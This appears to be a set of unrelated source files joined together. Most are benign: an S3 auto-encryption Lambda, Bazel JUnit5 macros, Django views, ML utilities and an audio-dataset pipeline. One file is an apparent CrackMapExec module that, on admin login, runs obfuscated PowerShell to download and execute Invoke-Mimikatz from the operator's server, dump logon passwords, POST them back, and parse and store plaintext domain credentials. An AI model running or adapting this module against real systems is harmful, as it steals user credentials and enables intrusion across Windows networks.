# Source of view_roles
indexes = [
{
"bk_biz_id": self.data.bk_biz_id,
"result_table_id": self.data.table_id,
"result_table_name": self.data.collector_config_name,
"time_field": "dtEventTimeStamp",
}
]
index_set_name = _("[采集项]") + self.data.collector_config_name
if self.data.index_set_id:
index_set_handler = IndexSetHandler(index_set_id=self.data.index_set_id)
if not view_roles:
view_roles = index_set_handler.data.view_roles
index_set = index_set_handler.update(
index_set_name=index_set_name, view_roles=view_roles, category_id=self.data.category_id, indexes=indexes
)
else:
project_id = ProjectInfo.objects.filter(bk_biz_id=self.data.bk_biz_id).first().project_id
if not view_roles:
view_roles = []
index_set = IndexSetHandler.create(
index_set_name=index_set_name,
project_id=project_id,
storage_cluster_id=storage_cluster_id,
scenario_id=Scenario.LOG,
view_roles=view_roles,
indexes=indexes,
category_id=self.data.category_id,
collector_config_id=self.collector_config_id,
)
self.data.index_set_id = index_set.index_set_id
self.data.etl_config = etl_config
self.data.save()
return model_to_dict(index_set)
|
#!/usr/bin/env python
import logging
import os
import boto3
from botocore.exceptions import ClientError
logging.getLogger('boto3').setLevel(logging.CRITICAL)
logging.getLogger('botocore').setLevel(logging.CRITICAL)
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
def lambda_handler(event, context):
s3client = boto3.client('s3')
buckets = s3client.list_buckets()['Buckets']
for bucketObj in buckets:
bucketName = bucketObj['Name']
logger.info("working on: {}".format(bucketName))
# Does the bucket already have encryption?
try:
s3client.get_bucket_encryption(Bucket=bucketName)
logger.info("Skipping '{}', already encrypted!".format(bucketName))
continue
except ClientError as e:
if e.response['Error']['Code'] == 'ServerSideEncryptionConfigurationNotFoundError':
logger.info("Bucket is not encrypted: '{}' - Enabling default encryption".format(bucketName))
else:
print(e)
continue
# Does it have tags?
try:
tagsSet = s3client.get_bucket_tagging(Bucket=bucketName)['TagSet']
# Is there an explicit opt-out tag called 'X-StopAutoEncrypt'?
# Use any() so that `continue` skips this bucket in the outer loop.
if any(tag['Key'] == 'X-StopAutoEncrypt' for tag in tagsSet):
logger.info("Due to tags, excluding bucket '{}'".format(bucketName))
continue
except ClientError as e:
if e.response['Error']['Code'] == 'NoSuchTagSet':
pass # continue onwards, no tags!
else:
print(e)
continue
s3client.put_bucket_encryption(
Bucket=bucketName,
ServerSideEncryptionConfiguration={
'Rules': [
{
'ApplyServerSideEncryptionByDefault': {
'SSEAlgorithm': 'AES256',
}
}
]
}
)
# Rough count all the objects (don't paginate on purpose)
r = s3client.list_objects_v2(Bucket=bucketName)
if r['IsTruncated']:
count = "1000+"
else:
count = r['KeyCount']
# Send a helpful message to the SNS Topic
snsclient = boto3.client('sns')
subj = "(!!): Enabled Encryption on '{}'".format(bucketName)
snsclient.publish(
TopicArn=os.getenv('SNSNotifyArn'),
# 100 char limit
Subject=(subj[:98] + '..') if len(subj) > 100 else subj,
Message="Bucket '{}' was automatically encrypted, there were {} items that are [maybe] not encrypted.".format(bucketName, count)
)
|
from core.helpers import create_ps_command, obfs_ps_script, gen_random_string
from datetime import datetime
from StringIO import StringIO
class CMEModule:
'''
Executes PowerSploit's Invoke-Mimikatz.ps1 script
Module by @byt3bl33d3r
'''
name = 'Mimikatz'
def options(self, context, module_options):
'''
COMMAND Mimikatz command to execute (default: 'sekurlsa::logonpasswords')
'''
self.mimikatz_command = 'privilege::debug sekurlsa::logonpasswords exit'
if module_options and 'COMMAND' in module_options:
self.mimikatz_command = module_options['COMMAND']
#context.log.debug("Mimikatz command: '{}'".format(self.mimikatz_command))
self.obfs_name = gen_random_string()
def on_admin_login(self, context, connection):
payload = '''
IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-Mimikatz.ps1');
$creds = Invoke-{func_name} -Command '{command}';
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
$request.Method = 'POST';
$request.ContentType = 'application/x-www-form-urlencoded';
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();'''.format(server=context.server,
port=context.server_port,
addr=context.localip,
func_name=self.obfs_name,
command=self.mimikatz_command)
context.log.debug('Payload: {}'.format(payload))
payload = create_ps_command(payload)
connection.execute(payload)
context.log.success('Executed payload')
def on_request(self, context, request):
if 'Invoke-Mimikatz.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open('data/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1', 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
else:
request.send_response(404)
request.end_headers()
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.getheader('content-length'))
data = response.rfile.read(length)
#We've received the response, stop tracking this host
response.stop_tracking_host()
#No reason to parse for passwords if we didn't run the default command
if 'sekurlsa::logonpasswords' in self.mimikatz_command:
buf = StringIO(data).readlines()
plaintext_creds = []
i = 0
while i < len(buf):
if ('Password' in buf[i]) and ('(null)' not in buf[i]):
passw = buf[i].split(':')[1].strip()
domain = buf[i-1].split(':')[1].strip().upper()
user = buf[i-2].split(':')[1].strip().lower()
#Dont parse machine accounts
if not user[-1:] == '$':
context.db.add_credential('plaintext', domain, user, passw)
plaintext_creds.append('{}\\{}:{}'.format(domain, user, passw))
i += 1
if plaintext_creds:
context.log.success('Found plain text credentials (domain\\user:password)')
for cred in plaintext_creds:
context.log.highlight(cred)
log_name = 'Mimikatz-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
with open('logs/' + log_name, 'w') as mimikatz_output:
mimikatz_output.write(data)
context.log.info("Saved Mimikatz's output to {}".format(log_name))
|
"""Calculate Functions"""
# Authors: Jeffrey Wang
# License: BSD 3 clause
import numpy as np
def calculate_batch(batch_size, length):
"""
Calculate the batch size for the data of given length.
Parameters
----------
batch_size : int, float, default=None
Batch size for training. Must be one of:
- int : Use `batch_size`.
- float : Use `batch_size * n_samples`.
- None : Use `n_samples`.
length : int
Length of the data to be batched.
Returns
-------
batch : int
Actual batch size.
"""
if batch_size is None : return length
elif isinstance(batch_size, int) and batch_size > 0 and \
batch_size <= length:
return batch_size
elif isinstance(batch_size, float) and 0 < batch_size <= 1:
return int(batch_size * length)
else:
raise ValueError("Batch size must be None, an int less than %d," % length,
"or a float within (0,1]")
def calculate_weight(Y, n_classes, class_weight=None, weights=None):
"""
Calculate the weights applied to the predicted labels,
combining class weights and sample weights.
Parameters
----------
Y : array-like, shape=(n_samples,)
Target labels as integers.
n_classes : int
Number of classes.
class_weight : dict, 'balanced', or None, default=None
Weights associated with classes in the form
`{class_label: weight}`. Must be one of:
- None : All classes have a weight of one.
- 'balanced': Class weights are automatically calculated as
`n_samples / (n_classes * np.bincount(Y))`.
weights : array-like, shape=(n_samples,), default=None
Sample weights. If None, then samples are equally weighted.
Returns
-------
weights : array-like, shape=(n_samples,)
Weights combining sample weights and class weights.
"""
if class_weight is None and weights is None : return np.ones(len(Y))
elif weights is None : weights = np.ones(len(Y))
d = class_weight
if isinstance(d, str) and d == 'balanced':
l = len(Y) / (n_classes * np.bincount(Y))
d = {k: l[k] for k in range(len(l))}
if isinstance(d, dict):
class_weights = np.array([d[k] for k in Y])
elif d is None : class_weights = np.ones(len(Y))
else : raise ValueError("Class Weight must either be a dict or 'balanced' or None")
return weights * class_weights
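# Illustrative 'balanced' example (not from the source):
#   Y = [0, 0, 1], n_classes = 2, np.bincount(Y) = [2, 1]
#   per-class weights = 3 / (2 * [2, 1]) = [0.75, 1.5]
#   returned per-sample weights = [0.75, 0.75, 1.5]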
def calculate_bootstrap(bootstrap_size, length):
"""
Calculate the bootstrap size for the data of given length.
Parameters
----------
bootstrap_size : int, float, default=None
Bootstrap size for training. Must be one of:
- int : Use `bootstrap_size`.
- float : Use `bootstrap_size * n_samples`.
- None : Use `n_samples`.
length : int
Length of the data to be bootstrapped.
Returns
-------
bootstrap : int
Actual bootstrap size.
"""
if bootstrap_size is None:
return length
elif isinstance(bootstrap_size, int) and bootstrap_size > 0:
return bootstrap_size
elif isinstance(bootstrap_size, float) and 0 < bootstrap_size <= 1:
return int(bootstrap_size * length)
else : raise ValueError("Bootstrap Size must be None, a positive int or float in (0,1]")
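# Illustrative behaviour (not from the source) for 200 samples:
#   calculate_bootstrap(None, 200) -> 200
#   calculate_bootstrap(300, 200)  -> 300   (positive ints are not capped at length)
#   calculate_bootstrap(0.5, 200)  -> 100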
|
import pandas as pd
df_estimation = pd.read_csv('results_pooled/strucfunc_estimation.csv')
df_forecast = pd.read_csv('results_pooled/strucfunc_forecast.csv')
def make_column(df):
res = []
for i in ['1', '2', '3', '4', '5']:
m = df[i].mean()
std = df[i].std()
str = f"{m:.2f}({std:.2f})"
res.append(str)
return res
res_estimation = make_column(df_estimation)
res_forecast = make_column(df_forecast)
for i in range(5):
line = res_estimation[i] + "\t" + res_forecast[i]
print(line)
|
"""
Provides build and test targets for JUnit 5.
All of the test targets in this file support tags= and exclude_tags= parameters. These are
translated to JUnit 5 @Tag filters.
junit5_test_suite and junit5_test have the following naming convention:
${base_name}+${tags[0]}+${tags[1]}...+${tags[n]}-${exclude_tags[0]}-${exclude_tags[1]}...-${exclude_tags[m]}
This can be overridden by explicitly supplying name = "YourTestName" to the target.
"""
TEST_SIZES = [
None,
"small",
"medium",
"large",
"enormous",
]
JUNIT5_COMPONENTS = [
"jupiter",
"platform",
]
JUNIT5_GROUP_IDS = {
"jupiter": "org.junit.jupiter",
"platform": "org.junit.platform",
}
JUNIT5_ARTIFACT_ID_PATTERNS = {
"jupiter": "junit-jupiter-%s",
"platform": "junit-platform-%s",
}
JUNIT5_TEST_DEPS = [
"//third_party:junit5_jupiter_api",
]
JUNIT5_RUNTIME_DEPS = [
"//third_party:junit5_jupiter_engine",
"//third_party:junit5_platform_commons",
"//third_party:junit5_platform_console",
"//third_party:junit5_platform_engine",
"//third_party:junit5_platform_launcher",
"//third_party:opentest4j",
]
def junit5_maven_dependencies(component, artifacts, version):
"""
Create a maven_jar for each artifact.
"""
for artifact in artifacts:
junit5_maven_dependency(component, artifact, version)
def junit5_maven_dependency(component, artifact, version):
"""
Create a dependency on a JUnit 5 maven jar.
"""
if not component in JUNIT5_COMPONENTS:
fail("%s is not a JUnit 5 component." % component)
groupId = JUNIT5_GROUP_IDS[component]
artifactId = JUNIT5_ARTIFACT_ID_PATTERNS[component] % artifact
native.maven_jar(
name = _get_maven_name(component, artifact),
artifact = "%s:%s:%s" % (groupId, artifactId, version),
)
def _get_maven_name(component, artifact):
groupId = JUNIT5_GROUP_IDS[component]
artifactId = JUNIT5_ARTIFACT_ID_PATTERNS[component] % artifact
return "%s_%s" % (groupId.replace('.', '_'), artifactId.replace('-', '_'))
def junit5_java_libraries(component, artifacts, **kwargs):
for artifact in artifacts:
junit5_java_library(component, artifact, **kwargs)
def junit5_java_library(component, artifact, **kwargs):
native.java_library(
name = "junit5_%s_%s" % (component, artifact),
exports = [ "@%s//jar" % _get_maven_name(component, artifact) ],
**kwargs
)
def junit5_test_library(name, srcs, deps=[], _junit5_test_deps=JUNIT5_TEST_DEPS, **kwargs):
"""
Automatically adds JUnit 5 compile dependencies so you don't have to.
"""
native.java_library(
name = name,
srcs = srcs,
deps = deps + _junit5_test_deps,
testonly = 1,
**kwargs
)
def junit5_test_suites(sizes=TEST_SIZES, **kwargs):
"""
Create a test suite for the specified test sizes. Defaults to creating one test suite for every
possible test size, including unlabelled.
"""
for size in sizes:
junit5_test_suite(size, **kwargs)
def junit5_test_suite(size, src_dir=None, **kwargs):
"""
Create a test suite that will run every test of the given size that is included in this target,
and in this package.
If size is None, then this suite will run unlabelled tests. If size is "all", then this suite will
run every test regardless of size.
If a test is tagged with more than one size, it will only run with the larger size.
"""
if size != "all" and not size in TEST_SIZES:
fail("%s is not a valid test size." % size)
selection_flags = [
"--select-package %s" % _get_java_package(PACKAGE_NAME, src_dir)
]
if size != "all":
selection_flags += _get_size_flags(size)
size_string = size or "Unlabelled"
suite_name = size_string.capitalize() + "Tests"
_junit5_test(
base_name = suite_name,
selection_flags = selection_flags,
size = size if size != "all" else None,
**kwargs
)
def junit5_test(base_name, srcs, src_dir=None, **kwargs):
"""
Run the JUnit 5 tests in srcs.
"""
java_package = _get_java_package(PACKAGE_NAME, src_dir)
class_names = _get_class_names(java_package, srcs)
selection_flags = [ "--select-class %s" % class_name for class_name in class_names ]
_junit5_test(
base_name = base_name,
selection_flags = selection_flags,
srcs = srcs,
**kwargs
)
def _junit5_test(
base_name,
selection_flags,
name=None,
tags=[],
exclude_tags=[],
deps=[],
runtime_deps=[],
_junit5_test_deps=JUNIT5_TEST_DEPS,
_junit5_runtime_deps=JUNIT5_RUNTIME_DEPS,
**kwargs):
if name == None:
name = base_name
for tag in sorted(tags):
name += "+" + tag
for tag in sorted(exclude_tags):
name += "-" + tag
flags = selection_flags + _get_tag_flags(tags, exclude_tags)
native.java_test(
name = name,
args = flags,
main_class = "org.junit.platform.console.ConsoleLauncher",
use_testrunner = False,
deps = deps + _junit5_test_deps if deps else None,
runtime_deps = runtime_deps + _junit5_runtime_deps,
**kwargs
)
def _get_java_package(dir_path, src_dir):
if src_dir == None:
src_dirs = [ "src/main/java/", "src/test/java/", "java/", "javatests/" ]
else:
if not src_dir.endswith('/'):
src_dir += '/'
src_dirs = [ src_dir ]
for dir in src_dirs:
index = _prefix_index(dir_path, dir)
if index >= 0:
sub_path = dir_path[index:]
return sub_path.replace('/', '.')
fail("Could not find a src root: %s in path: %s" % (src_dirs, dir_path))
def _prefix_index(haystack, needle):
if needle in haystack:
return haystack.index(needle) + len(needle)
else:
return -1
def _get_size_flags(size):
if size == None:
self_flag = []
else:
self_flag = [ "-t %s" % size ]
index = TEST_SIZES.index(size)
return self_flag + [ "-T %s" % s for s in TEST_SIZES[index+1:]]
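# Illustrative output (not from the source):
#   _get_size_flags("small") -> ["-t small", "-T medium", "-T large", "-T enormous"]
# i.e. select "small" tests and exclude every larger size.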
def _get_tag_flags(tags, exclude_tags):
return [ "-t %s" % tag for tag in tags ] + [ "-T %s" % tag for tag in exclude_tags ]
def _get_class_names(java_package, srcs):
class_names = []
tail = ".java"
for src in srcs:
if not src.endswith(tail):
continue
stripped_src = src[:len(src) - len(tail)]
class_names.append("%s.%s" % (java_package, stripped_src))
return class_names
|
from django.shortcuts import render, redirect,get_object_or_404
from django.http import HttpResponse,HttpResponseRedirect
from .models import Image, Profile,Instagram
from .forms import UserRegisterForm,CommentForm
from .email import send_welcome_email
from django.contrib.auth.decorators import login_required
# Create your views here.
def register(request):
if request.method == 'POST':
form = UserRegisterForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
return redirect('login')
else:
form = UserRegisterForm()
return render(request, 'registration/registration_form.html', {'form':form})
def image(request):
return render(request, 'instas/image.html')
def search_results(request):
if 'image' in request.GET and request.GET["image"]:
search_term = request.GET.get("image")
searched_images = Image.search_by_name(search_term)
message = f"{search_term}"
return render(request, 'instas/search.html',{"message":message,"images": searched_images})
else:
message = "Nothing has been searched"
return render(request, 'instas/search.html',{"message":message})
pass
@login_required
def index(request):
images = Image.objects.all()
if request.method == "POST":
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
# comment.image = post
comment.save()
return redirect('index')
else:
form = CommentForm()
context={
'images':images,
'form': form
}
return render(request,'instas/index.html',context)
@login_required(login_url='/register/')
def likePost(request,image_id):
image = Image.objects.get(pk = image_id)
if image.likes.filter(id = request.user.id).exists():
image.likes.remove(request.user)
is_liked = False
else:
image.likes.add(request.user)
is_liked = True
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
@login_required(login_url='/register/')
def add_comment_to_post(request, pk):
# post = get_object_or_404(Post, pk=pk)
if request.method == "POST":
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
# comment.image = post
comment.save()
return redirect('index')
else:
form = CommentForm()
return render(request, 'instas/post_detail.html', {'form': form})
|
#!/usr/bin/env python
'''
Exercise 2 - class 10
'''
from jnpr.junos import Device
from jnpr.junos import exception
from jnpr.junos.op.ethport import EthPortTable
from getpass import getpass
import sys
HOST = '184.105.247.76'
USER = 'pyclass'
PWD = getpass()
def remote_conn(hst, usr, pwd):
'''
Open the remote connection to the device
'''
try:
dev = Device(host=hst, user=usr, password=pwd)
o_dev = dev.open()
except exception.ConnectAuthError:
print 'Incorrect username or password'
return False
return o_dev
def main():
'''
Main function
'''
a_device = remote_conn(HOST, USER, PWD)
if not a_device:
sys.exit('Fix the above errors. Exiting...')
ports = EthPortTable(a_device)
ports.get()
for port in ports.keys():
print port
port_items = dict(ports[port].items())
print ' Oper: %s' % (port_items['oper'])
print ' rx: %s' % (port_items['rx_packets'])
print ' tx: %s' % (port_items['tx_packets'])
print
if __name__ == '__main__':
main()
|
# coding=utf-8
import pickle
import pathlib
# dictionary of unitid's to fix
# key = NSF inst_id, value = IPEDS Unitid
fixes = {
1081: 104151, # Arizona State University
100132: 109651, # Art Center College of Design
1158: 110468, # Alliant International University
8718: 129020, # University of Connecticut
1479: 133553, # Embry-Riddle Aeronautical University
1657: 143853, # Midwestern University
# 101674: 154174, # Palmer College of Chiropractic, Port Orange
330010: 160621, # Southern University and A&M College, Agricultural Research and Extension Center
29977: 162928, # Johns Hopkins University
233046: 172699, # Western Michigan University and Homer Stryker M.D. School of Medicine
102059: 176017, # University of Mississippi
100588: 181020, # Doane University
2589: 183044, # University of New Hampshire
8770: 184694, # Fairleigh Dickinson University
2671: 189088, # Bard College
# 102091: 190576, # City University of New York, Graduate School of Public Health and Health Policy
# 102060: 190576, # City University of New York, The, Advanced Science Research Center
8780: 192448, # Long Island University
# 330009: 196060, # State University of New York, University at Albany, College of Nanoscale Science and Engineering
12310: 200800, # University of Akron, The
8796: 201441, # Bowling Green State University
8805: 201885, # University of Cincinnati
8799: 203517, # Kent State University
8800: 204024, # Miami University
8802: 204796, # Ohio State University, The
8803: 204857, # Ohio University
9167: 206604, # Wright State University
# 666053: 207315, # Oklahoma State University Tulsa
8807: 207500, # University of Oklahoma, The, Norman and Health Science Center
102041: 207500, # University of Oklahoma, The, Tulsa
3198: 209065, # Linfield College
3210: 209542, # Oregon State University
# 7785: 221759, # University of Tennessee, The, Knoxville, Institute of Agriculture
353086: 221999, # Vanderbilt University and Vanderbilt University Medical Center
208828: 231624, # College of William and Mary and Virginia Institute of Marine Science
10724: 241331, # Carlos Albizu University (San Juan, PR)
41426: 459736, # Touro University
102044: 492689 # Texas Tech University Health Sciences Center, El Paso
}
file_spec = pathlib.Path.cwd() / 'data/inst_id_fixes.pickle'
with open(file_spec, 'wb') as f:
# Pickle the dictionary using the highest protocol available.
pickle.dump(fixes, f, pickle.HIGHEST_PROTOCOL)
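# Illustrative round-trip check (assumes the same working directory):
#   with open(file_spec, 'rb') as f:
#       assert pickle.load(f)[1081] == 104151  # Arizona State University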
print('All Done.')
|
#!/usr/bin/env python3
"""
WRITEME [outline the steps in the pipeline]
This pipeline preprocesses CoughVid 2.0 data.
The target is the self-reported multiclass diagnosis.
The idea is that each of these tasks should have a separate working
directory in _workdir. We remove it only when the entire pipeline
is done. This is safer, even though it uses more disk space.
(The principle here is we don't remove any working dirs during
processing.)
When hacking on this file, consider only enabling one Task at a
time in __main__.
TODO:
* We need all the files in the README.md created for each dataset
(task.json, train.csv, etc.).
* After downloading from Zenodo, check that the zipfile has the
correct MD5.
* It would be nice to add the 50th and 75th percentile audio length
to the metadata.
"""
import csv
import glob
import os
import shutil
import subprocess
import luigi
import numpy as np
import pandas as pd
import soundfile as sf
from slugify import slugify
from tqdm.auto import tqdm
import heareval.tasks.config.coughvid as config
import heareval.tasks.util.audio as audio_util
import heareval.tasks.util.luigi as luigi_util
from heareval.tasks.util.luigi import WorkTask
class DownloadCorpus(WorkTask):
@property
def name(self):
return type(self).__name__
def run(self):
# TODO: Change the working dir
luigi_util.download_file(
"https://zenodo.org/record/4498364/files/public_dataset.zip",
os.path.join(self.workdir, "corpus.zip"),
)
with self.output().open("w") as _:
pass
@property
def stage_number(self) -> int:
return 0
class ExtractCorpus(WorkTask):
def requires(self):
return DownloadCorpus()
@property
def name(self):
return type(self).__name__
def run(self):
# Location of zip file to extract. Figure this out before changing
# the working directory.
corpus_zip = os.path.realpath(
os.path.join(self.requires().workdir, "corpus.zip")
)
subprocess.check_output(["unzip", "-o", corpus_zip, "-d", self.workdir])
with self.output().open("w") as _:
pass
class FilterLabeledMetadata(WorkTask):
"""
Filter the metadata (labels) to only contain audiofiles that
are labeled, and save it in metadata.csv with columns:
filename (without extension), label
"""
def requires(self):
return ExtractCorpus()
@property
def name(self):
return type(self).__name__
def run(self):
labeldf = pd.read_csv(
os.path.join(
self.requires().workdir, "public_dataset/metadata_compiled.csv"
)
)
sublabeldf = labeldf[labeldf["status"].notnull()]
sublabeldf.to_csv(
os.path.join(self.workdir, "metadata.csv"),
columns=["uuid", "status"],
index=False,
header=False,
)
with self.output().open("w") as _:
pass
class SubsampleCorpus(WorkTask):
"""
Subsample the corpus so that we have the appropriate number of
audio files.
NOTE: We skip audio files that aren't in FilterLabeledMetadata.
Additionally, since the upstream data files might be in subfolders,
we slugify them here so that we just have one flat directory.
(TODO: Double check this works.)
A destructive way of implementing this task is that it removes
extraneous files, rather than copying them to the next task's
directory. However, one safety convention we apply is doing
non-destructive work, one working directory per task (or set
of related tasks of the same class, like resampling with different
SRs).
"""
def requires(self):
return [ExtractCorpus(), FilterLabeledMetadata()]
@property
def name(self):
return type(self).__name__
def run(self):
# Really coughvid? webm + ogg?
audiofiles = list(
glob.glob(os.path.join(self.requires()[0].workdir, "public_dataset/*.webm"))
+ glob.glob(
os.path.join(self.requires()[0].workdir, "public_dataset/*.ogg")
)
)
labeldf = pd.read_csv(
os.path.join(self.requires()[1].workdir, "metadata.csv"),
header=None,
names=["filename", "label"],
)
filename_with_labels = list(labeldf["filename"].to_numpy())
assert len(filename_with_labels) == len(set(filename_with_labels))
filename_with_labels = set(filename_with_labels)
# Filter audiofiles to only ones with labels
audiofiles = [
a
for a in audiofiles
if os.path.splitext(os.path.split(a)[1])[0] in filename_with_labels
]
assert len(audiofiles) == len(filename_with_labels)
# Make sure we found audio files to work with
if len(audiofiles) == 0:
raise RuntimeError(f"No audio files found in {self.requires()[0].workdir}")
# Deterministically randomly sort all files by their hash
audiofiles.sort(key=lambda filename: luigi_util.filename_to_int_hash(filename))
if len(audiofiles) > config.MAX_FILES_PER_CORPUS:
print(
"%d audio files in corpus, keeping only %d"
% (len(audiofiles), config.MAX_FILES_PER_CORPUS)
)
# Save diskspace using symlinks
for audiofile in audiofiles[: config.MAX_FILES_PER_CORPUS]:
# Extract the audio filename, excluding the old working
# directory, but including all subfolders
newaudiofile = os.path.join(
self.workdir,
os.path.split(
slugify(os.path.relpath(audiofile, self.requires()[0].workdir))
)[0],
# This is pretty gnarly but we do it to not slugify
# the filename extension
os.path.split(audiofile)[1],
)
# Make sure we don't have any duplicates
assert not os.path.exists(newaudiofile)
os.symlink(os.path.realpath(audiofile), newaudiofile)
with self.output().open("w") as _:
pass
class ToMonoWavCorpus(WorkTask):
"""
Convert all audio to WAV files using Sox.
We convert to mono, and also ensure that all files are the same length.
"""
def requires(self):
return SubsampleCorpus()
@property
def name(self):
return type(self).__name__
def run(self):
audiofiles = list(
glob.glob(os.path.join(self.requires().workdir, "*.webm"))
+ glob.glob(os.path.join(self.requires().workdir, "*.ogg"))
)
for audiofile in tqdm(audiofiles):
newaudiofile = luigi_util.new_basedir(
os.path.splitext(audiofile)[0] + ".wav", self.workdir
)
audio_util.convert_to_mono_wav(audiofile, newaudiofile)
with self.output().open("w") as _:
pass
class EnsureLengthCorpus(WorkTask):
"""
Ensure all WAV files are a particular length.
There might be an ffmpeg one-liner that converts to WAV
and enforces the file length at the same time.
"""
def requires(self):
return ToMonoWavCorpus()
@property
def name(self):
return type(self).__name__
def run(self):
for audiofile in tqdm(
list(glob.glob(os.path.join(self.requires().workdir, "*.wav")))
):
x, sr = sf.read(audiofile)
target_length_samples = int(round(sr * config.SAMPLE_LENGTH_SECONDS))
# Convert to mono
if x.ndim == 2:
x = np.mean(x, axis=1)
assert x.ndim == 1, "Audio should be mono"
# Trim if necessary
x = x[:target_length_samples]
if len(x) < target_length_samples:
x = np.hstack([x, np.zeros(target_length_samples - len(x))])
assert len(x) == target_length_samples
newaudiofile = luigi_util.new_basedir(audiofile, self.workdir)
sf.write(newaudiofile, x, sr)
with self.output().open("w") as _:
pass
class SplitTrainTestCorpus(WorkTask):
"""
If there is already a train/test split, we use that.
Otherwise we split deterministically, hashing each filename (via luigi_util.which_set).
"""
def requires(self):
return EnsureLengthCorpus()
@property
def name(self):
return type(self).__name__
def run(self):
for audiofile in tqdm(list(glob.glob(f"{self.requires().workdir}/*.wav"))):
partition = luigi_util.which_set(
audiofile, validation_percentage=0.0, testing_percentage=10.0
)
partition_dir = f"{self.workdir}/{partition}"
luigi_util.ensure_dir(partition_dir)
newaudiofile = luigi_util.new_basedir(audiofile, partition_dir)
os.symlink(os.path.realpath(audiofile), newaudiofile)
with self.output().open("w") as _:
pass
class SplitTrainTestMetadata(WorkTask):
"""
Split the metadata into train / test.
"""
def requires(self):
"""
This depends upon SplitTrainTestCorpus to get the partitioned WAV
filenames, and the subsampled metadata in SubsampleMetadata.
"""
return [SplitTrainTestCorpus(), FilterLabeledMetadata()]
@property
def name(self):
return type(self).__name__
def run(self):
# Unfortunately, this somewhat fragilely depends upon the order
# of self.requires
# Might also want "val" for some corpora
for partition in ["train", "test"]:
audiofiles = list(
glob.glob(os.path.join(self.requires()[0].workdir, partition, "*.wav"))
)
# Make sure we found audio files to work with
if len(audiofiles) == 0:
raise RuntimeError(
f"No audio files found in {self.requires()[0].workdir}/{partition}"
)
labeldf = pd.read_csv(
os.path.join(self.requires()[1].workdir, "metadata.csv"),
header=None,
names=["filename", "label"],
)
# Add WAV extension
labeldf["filename"] = labeldf["filename"] + ".wav"
audiodf = pd.DataFrame(
[os.path.split(a)[1] for a in audiofiles], columns=["filename"]
)
assert len(audiofiles) == len(audiodf.drop_duplicates())
sublabeldf = labeldf.merge(audiodf, on="filename")
sublabeldf.to_csv(
os.path.join(self.workdir, f"{partition}.csv"),
columns=["filename", "label"],
index=False,
header=False,
)
with self.output().open("w") as _:
pass
class MetadataVocabulary(WorkTask):
"""
Mapping from metadata labels to non-negative integers.
"""
def requires(self):
return SplitTrainTestMetadata()
@property
def name(self):
return type(self).__name__
def run(self):
labelset = set()
# Might also want "val" for some corpora
for partition in ["train", "test"]:
labeldf = pd.read_csv(
os.path.join(self.requires().workdir, f"{partition}.csv"),
header=None,
names=["filename", "label"],
)
labelset = labelset | set(labeldf["label"].unique().tolist())
labelcsv = csv.writer(
open(os.path.join(self.workdir, "labelvocabulary.csv"), "wt")
)
for idx, label in enumerate(sorted(list(labelset))):
labelcsv.writerow([label, idx])
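# labelvocabulary.csv ends up with one "label,index" row per class, sorted by
# label name, e.g. (hypothetical labels) "dog,0" and "siren,1".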
with self.output().open("w") as _:
pass
class ResampleSubCorpus(WorkTask):
sr = luigi.IntParameter()
partition = luigi.Parameter()
def requires(self):
return SplitTrainTestCorpus()
@property
def name(self):
return type(self).__name__
# Since these tasks have parameters but share the same working
# directory and name, we postpend the parameters to the output
# filename, so we can track if one ResampleSubCorpus task finished
# but others didn't.
def output(self):
return luigi.LocalTarget(
"_workdir/%02d-%s-%d-%s.done"
% (self.stage_number, self.name, self.sr, self.partition)
)
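# For example (illustrative values only): with stage_number 5, sr 44100 and
# partition "train", the marker file would be
# "_workdir/05-ResampleSubCorpus-44100-train.done".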
def run(self):
resample_dir = f"{self.workdir}/{self.sr}/{self.partition}/"
luigi_util.ensure_dir(resample_dir)
for audiofile in tqdm(
list(glob.glob(f"{self.requires().workdir}/{self.partition}/*.wav"))
):
resampled_audiofile = luigi_util.new_basedir(audiofile, resample_dir)
audio_util.resample_wav(audiofile, resampled_audiofile, self.sr)
with self.output().open("w") as _:
pass
class FinalizeCorpus(WorkTask):
"""
Create a final corpus, no longer in _workdir but in the top-level
at directory config.TASKNAME.
"""
def requires(self):
return (
[
ResampleSubCorpus(sr, partition)
for sr in config.SAMPLE_RATES
for partition in ["train", "test", "val"]
]
+ [SplitTrainTestMetadata()]
+ [MetadataVocabulary()]
)
@property
def name(self):
return type(self).__name__
# We overwrite workdir here, because we want the output to be
# the finalized top-level task directory
@property
def workdir(self):
return os.path.join("tasks", config.TASKNAME)
def run(self):
if os.path.exists(self.workdir):
shutil.rmtree(self.workdir)
# Fragilely depends upon the order of the requires
shutil.copytree(self.requires()[0].workdir, self.workdir)
# Might also want "val" for some corpora
for partition in ["train", "test"]:
shutil.copy(
os.path.join(self.requires()[-2].workdir, f"{partition}.csv"),
self.workdir,
)
shutil.copy(
os.path.join(self.requires()[-1].workdir, "labelvocabulary.csv"),
self.workdir,
)
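# The finalized layout is tasks/<TASKNAME>/<sample rate>/<partition>/*.wav,
# plus train.csv, test.csv and labelvocabulary.csv at the top level.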
with self.output().open("w") as _:
pass
def main():
print("max_files_per_corpus = %d" % config.MAX_FILES_PER_CORPUS)
luigi_util.ensure_dir("_workdir")
luigi.build([FinalizeCorpus()], workers=config.NUM_WORKERS, local_scheduler=True)
if __name__ == "__main__":
main()
|
# HOW TO USE:
# gsutil -q -m cp -r 'gs://magentadata/models/music_transformer/*' <destination folder>
# python main.py -model_path=path/to/model/checkpoints/unconditional_model_16.ckpt -output_dir=/tmp -decode_length=1024 -primer_path=path/to/primer_mid -num_samples=1
